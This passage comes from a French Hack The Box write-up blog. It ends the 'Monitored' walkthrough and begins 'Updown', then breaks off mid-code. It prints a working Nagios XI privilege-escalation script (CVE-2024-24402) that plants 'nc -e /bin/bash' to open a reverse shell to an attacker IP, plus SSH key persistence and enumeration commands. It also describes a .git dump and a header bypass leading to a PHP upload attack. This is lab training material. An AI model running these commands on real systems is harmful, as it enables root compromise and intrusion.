class="cl">nagios@monitored:/home/nagios$ ^Z </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + <span class="m">68520</span> suspended nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">$ stty raw -echo<span class="p">;</span><span class="nb">fg</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + <span class="m">68520</span> continued nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">nagios@monitored:/home/nagios$ whoami </span></span><span class="line"><span class="cl">nagios </span></span><span class="line"><span class="cl">nagios@monitored:/home/nagios$ ls </span></span><span class="line"><span class="cl">cookie.txt shell user.txt </span></span><span class="line"><span class="cl">nagios@monitored:/home/nagios$ cat user.txt </span></span><span class="line"><span class="cl">213b4331f50e5f1072d301938db28331 </span></span></code></pre></td></tr></table> </div> </div><h3 id="ssh-to-nagios">SSH to nagios </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nagios@monitored:/home/nagios$ <span class="nb">cd</span> .ssh </span></span><span class="line"><span class="cl">nagios@monitored:/home/nagios/.ssh$ ssh-keygen -t rsa </span></span><span class="line"><span class="cl">Generating public/private rsa key pair. </span></span><span class="line"><span class="cl">Enter file in which to save the key <span class="o">(</span>/home/nagios/.ssh/id_rsa<span class="o">)</span>: </span></span><span class="line"><span class="cl">Enter passphrase <span class="o">(</span>empty <span class="k">for</span> no passphrase<span class="o">)</span>: </span></span><span class="line"><span class="cl">Enter same passphrase again: </span></span><span class="line"><span class="cl">Your identification has been saved in /home/nagios/.ssh/id_rsa </span></span><span class="line"><span class="cl">Your public key has been saved in /home/nagios/.ssh/id_rsa.pub </span></span><span class="line"><span class="cl">The key fingerprint is: </span></span><span class="line"><span class="cl">SHA256:2NBZpIJ+HjRmFS93s8DRbV8sAp4rqh+3kPsTvXVzki0 nagios@monitored </span></span><span class="line"><span class="cl">The key s randomart image is: </span></span><span class="line"><span class="cl">+---<span class="o">[</span>RSA 3072<span class="o">]</span>----+ </span></span><span class="line"><span class="cl">...... </span></span><span class="line"><span class="cl">+----<span class="o">[</span>SHA256<span class="o">]</span>-----+ </span></span><span class="line"><span class="cl">nagios@monitored:/home/nagios/.ssh$ cat id_rsa.pub </span></span><span class="line"><span class="cl">ssh-rsa AAAAB3NzaC....id8HqID90SBHsANCYUhofRFH5rCG3alGvYyYNMu+Wk<span class="o">=</span> nagios@monitored </span></span><span class="line"><span class="cl">nagios@monitored:/home/nagios/.ssh$ mv id_rsa.pub authorized_keys </span></span><span class="line"><span class="cl">nagios@monitored:/home/nagios/.ssh$ ls </span></span><span class="line"><span class="cl">authorized_keys id_rsa </span></span><span class="line"><span class="cl">nagios@monitored:/home/nagios/.ssh$ cat id_rsa </span></span><span class="line"><span class="cl">-----BEGIN OPENSSH PRIVATE KEY----- </span></span><span class="line"><span class="cl">b3BlbnNzaC1rZXktdjEAAAAABG5v.......c0Btb25pdG9yZWQBAg<span class="o">==</span> </span></span><span class="line"><span class="cl">-----END OPENSSH PRIVATE KEY----- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Copy the id_rsa to my machine and connect to nagios using SSH</span> </span></span><span class="line"><span class="cl">$ vim nagios.key </span></span><span class="line"><span class="cl">$ chmod <span class="m">600</span> nagios.key </span></span><span class="line"><span class="cl">$ ssh nagios@10.10.11.248 -i nagios.key </span></span><span class="line"><span class="cl">Linux monitored 5.10.0-28-amd64 <span class="c1">#1 SMP Debian 5.10.209-2 (2024-01-31) x86_64</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">Last login: Wed Mar <span class="m">27</span> 10:32:47 <span class="m">2024</span> from 10.10.14.23 </span></span><span class="line"><span class="cl">nagios@monitored:~$ whoami </span></span><span class="line"><span class="cl">nagios </span></span><span class="line"><span class="cl">nagios@monitored:~$ cat user.txt </span></span><span class="line"><span class="cl">213b....8331 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="cve-2024-24402">CVE-2024-24402 </h3><p>Je lance une recherche sur google :</p> <ul> <li>&ldquo;exploit nagiosxi script as root&rdquo; ce qui m&rsquo;amène vers ce lien :</li> <li><a class="link" href="https://gist.github.com/sec-fortress/6d128a5e290e873be4c2ca27b6579eca" target="_blank" rel="noopener" >https://gist.github.com/sec-fortress/6d128a5e290e873be4c2ca27b6579eca</a></li> </ul> <p>ou encore la recherche :</p> <ul> <li>&ldquo;cve nagioxi priv esc&rdquo; qui m&rsquo;amène vers ce lien, expliquant la même CVE :</li> <li><a class="link" href="https://github.com/MAWK0235/CVE-2024-24402" target="_blank" rel="noopener" >https://github.com/MAWK0235/CVE-2024-24402</a></li> </ul> <p>En faisant sudo -l, on se rend compte qu&rsquo;on peut executer beaucoup de binaires en tant que <strong>root</strong> avec sudo. En regardant de plus près les scripts, il ne s&rsquo;agit que de scripts de <strong>nagiosxi</strong> qui n&rsquo;ont pas subis de modification.</p> <p>Ce qui veut signifie que s&rsquo;il existe un moyen d&rsquo;exploiter ces binaires, il existe probablement une <strong>CVE</strong> sur internet. Et si ne n&rsquo;est pas le cas, ils ne sont pas surement pas exploitables.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nagios@monitored:~$ sudo -l </span></span><span class="line"><span class="cl">Matching Defaults entries <span class="k">for</span> nagios on localhost: </span></span><span class="line"><span class="cl"> env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User nagios may run the following commands on localhost: </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /etc/init.d/nagios start </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /etc/init.d/nagios stop </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /etc/init.d/nagios restart </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /etc/init.d/nagios reload </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /etc/init.d/nagios status </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /etc/init.d/nagios checkconfig </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /etc/init.d/npcd start </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /etc/init.d/npcd stop </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /etc/init.d/npcd restart </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /etc/init.d/npcd reload </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /etc/init.d/npcd status </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php * </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php * </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/migrate/migrate.php * </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/local/nagiosxi/scripts/components/getprofile.sh </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/local/nagiosxi/scripts/upgrade_to_latest.sh </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/local/nagiosxi/scripts/change_timezone.sh </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/local/nagiosxi/scripts/manage_services.sh * </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/local/nagiosxi/scripts/reset_config_perms.sh </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/local/nagiosxi/scripts/manage_ssl_config.sh * </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/local/nagiosxi/scripts/backup_xi.sh * </span></span></code></pre></td></tr></table> </div> </div><p>Voici ce que contient le fichier executable nous permettant d&rsquo;exploiter <code>/usr/local/nagiosxi/scripts/manage_services.sh</code> pour devenir root :<br> <code>exploit.sh </code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="cp">#!/bin/bash </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Create npcd script</span> </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;#!/bin/bash&#34;</span> &gt; /tmp/npcd </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;nc -e /bin/bash 10.10.14.14 4445&#34;</span> &gt;&gt; /tmp/npcd </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Grant executable permissions on the npcd script</span> </span></span><span class="line"><span class="cl">chmod +x /tmp/npcd 2&gt;/dev/null </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Stop the npcd service</span> </span></span><span class="line"><span class="cl">sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Replace original npcd script</span> </span></span><span class="line"><span class="cl">cp /tmp/npcd /usr/local/nagios/bin/npcd 2&gt;/dev/null </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;[+] Start Up your listener&#34;</span> </span></span><span class="line"><span class="cl">sleep <span class="m">1</span> </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;[+] nc -lvnp 4445&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">sleep <span class="m">15</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;[+] Expect your shellzz xD&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># start service to recieve reverse shell</span> </span></span><span class="line"><span class="cl">sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">sleep <span class="m">5</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;[+] done&#34;</span> </span></span></code></pre></td></tr></table> </div> </div><p>Il faut donc remplacer le binaire <strong>ntpd</strong> par un faux contenant un reverse shell, puis redemarrer le service en utilisant le script <strong>manage_services.sh</strong> avec <strong>sudo</strong>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nagios@monitored:~$ ./exploit.sh </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Start Up your listener </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> nc -lvnp <span class="m">4445</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Expect your shellzz xD </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> <span class="k">done</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">nc -lnvp <span class="m">4445</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::4445 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:4445 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.11.248. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.11.248:40642. </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl"><span class="nb">cd</span> /root </span></span><span class="line"><span class="cl">cat root.txt </span></span><span class="line"><span class="cl">cf92....0a0a </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/updown-htb/Thu, 30 Oct 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/updown-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Updown cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Updown</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.177</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.177 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">3072</span> 9e1f98d7c8ba61dbf149669d701702e7 <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDl7j17X/EWcm1MwzD7sKOFZyTUggWH1RRgwFbAK+B6R28x47OJjQW8VO4tCjTyvqKBzpgg7r98xNEykmvnMr0V9eUhg6zf04GfS/gudDF3Fbr3XnZOsrMmryChQdkMyZQK1HULbqRij1tdHaxbIGbG5CmIxbh69mMwBOlinQINCStytTvZq4btP5xSMd8pyzuZdqw3Z58ORSnJAorhBXAmVa9126OoLx7AzL0aO3lqgWjo/wwd3FmcYxAdOjKFbIRiZK/f7RJHty9P2WhhmZ6mZBSTAvIJ36Kb4Z0NuZ+ztfZCCDEw3z3bVXSVR/cp0Z0186gkZv8w8cp/ZHbtJB/nofzEBEeIK8gZqeFc/hwrySA6yBbSg0FYmXSvUuKgtjTgbZvgog66h+98XUgXheX1YPDcnUU66zcZbGsSM1aw1sMqB1vHhd2LGeY8UeQ1pr+lppDwMgce8DO141tj+ozjJouy19Tkc9BB46FNJ43Jl58CbLPdHUcWeMbjwauMrw0<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> c21cfe1152e3d7e5f759186b68453f62 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKMJ3/md06ho+1RKACqh2T8urLkt1ST6yJ9EXEkuJh0UI/zFcIffzUOeiD2ZHphWyvRDIqm7ikVvNFmigSBUpXI<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 5f6e12670a66e8e2b761bec4143ad38e <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL1VZrZbtNuK2LKeBBzfz0gywG4oYxgPl+s5QENjani1 </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">63</span> Apache httpd 2.4.41 <span class="o">((</span>Ubuntu<span class="o">))</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Is my Website up ? </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.41 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="siteisuphtb---port-80">siteisup.htb - Port 80 </h3><h3 id="subdomain-devsiteisuphtb">Subdomain dev.siteisup.htb </h3><p>On trouve une sous-domaine, mais aucune page ne semble accessible (&ldquo;forbidden&rdquo;).</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">gobuster vhost -u <span class="s2">&#34;siteisup.htb&#34;</span> -w <span class="sb">`</span>fzf-wordlists<span class="sb">`</span> --append-domain </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Gobuster v3.6 </span></span><span class="line"><span class="cl">by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> <span class="p">&amp;</span> Christian Mehlmauer <span class="o">(</span>@firefart<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Url: http://siteisup.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Method: GET </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Threads: <span class="m">10</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Wordlist: /opt/lists/seclists/Discovery/DNS/subdomains-top1million-110000.txt </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> User Agent: gobuster/3.6 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Timeout: 10s </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Append Domain: <span class="nb">true</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Starting gobuster in VHOST enumeration <span class="nv">mode</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Found: dev.siteisup.htb Status: <span class="m">403</span> <span class="o">[</span>Size: 281<span class="o">]</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="devgit---git-dumper">dev/.git - git-dumper </h3><p>On trouve une dossier dev/.git :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">dirsearch -u http://siteisup.htb/dev </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> _<span class="p">|</span>. _ _ _ _ _ _<span class="p">|</span>_ v0.4.3 </span></span><span class="line"><span class="cl"> <span class="o">(</span>_<span class="o">||</span><span class="p">|</span> _<span class="o">)</span> <span class="o">(</span>/_<span class="o">(</span>_<span class="o">||</span> <span class="o">(</span>_<span class="p">|</span> <span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Extensions: php, asp, aspx, jsp, html, htm <span class="p">|</span> HTTP method: GET <span class="p">|</span> Threads: <span class="m">25</span> <span class="p">|</span> Wordlist size: <span class="m">12289</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Target: http://siteisup.htb/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>00:47:20<span class="o">]</span> Scanning: dev/ </span></span><span class="line"><span class="cl"><span class="o">[</span>00:47:22<span class="o">]</span> <span class="m">301</span> - 315B - /dev/.git -&gt; http://siteisup.htb/dev/.git/ </span></span><span class="line"><span class="cl"><span class="o">[</span>00:47:22<span class="o">]</span> <span class="m">200</span> - 3KB - /dev/.git/ </span></span><span class="line"><span class="cl"><span class="o">[</span>00:47:22<span class="o">]</span> <span class="m">200</span> - 772B - /dev/.git/branches/ </span></span><span class="line"><span class="cl"><span class="o">[</span>00:47:22<span class="o">]</span> <span class="m">200</span> - 298B - /dev/.git/config </span></span><span class="line"><span class="cl"><span class="o">[</span>00:47:22<span class="o">]</span> <span class="m">200</span> - 73B - /dev/.git/description </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><p>Dans le .git, on trouve un fichier .htaccess nous indiquant qu&rsquo;un header spécifique permettrait de débloquer l&rsquo;accès à certaines pages.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ git-dumper http://siteisup.htb/dev/ ./git-dump </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">$ <span class="nb">cd</span> git-dump </span></span><span class="line"><span class="cl">$ cat .htaccess </span></span><span class="line"><span class="cl">SetEnvIfNoCase Special-Dev <span class="s2">&#34;only4dev&#34;</span> Required-Header </span></span><span class="line"><span class="cl">Order Deny,Allow </span></span><span class="line"><span class="cl">Deny from All </span></span><span class="line"><span class="cl">Allow from <span class="nv">env</span><span class="o">=</span>Required-Header </span></span></code></pre></td></tr></table> </div> </div><p>En essayant d&rsquo;accéder à <strong>dev.siteisup.htb</strong> en ajoutant le header, on obtient l&rsquo;accès à ce vhost !</p> <h3 id="checkerphp">checker.php </h3><p>On trouve un fichier changelog.txt indiquant qu&rsquo;une option nous permettant d&rsquo;upload des fichiers existe. <code>changelog.txt</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">cat changelog.txt </span></span><span class="line"><span class="cl">Beta version </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">1- Check a bunch of websites. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-- ToDo: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">1- Multithreading <span class="k">for</span> a faster version :D. </span></span><span class="line"><span class="cl">2- Remove the upload option. </span></span><span class="line"><span class="cl">3- New admin panel. </span></span></code></pre></td></tr></table> </div> </div><p>En analysant la page disponible sur dev.siteisup.htb et le fichier <strong>checker.php</strong> récupérer dans le .git, on comprend qu&rsquo;il s&rsquo;agit bien de la meme page.</p> <p>Cette page semble contenir une vulnérabilité de type File Upload, nous permettant eventuellement d&rsquo;executer du code PHP.</p> <h3 id="file-upload---php-rce">File Upload - PHP RCE </h3><p>La requete suivante permet d&rsquo;uploader un fichier PHP avec l&rsquo;extension <strong>.phar</strong>, qui sera executé correctement comme du php :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 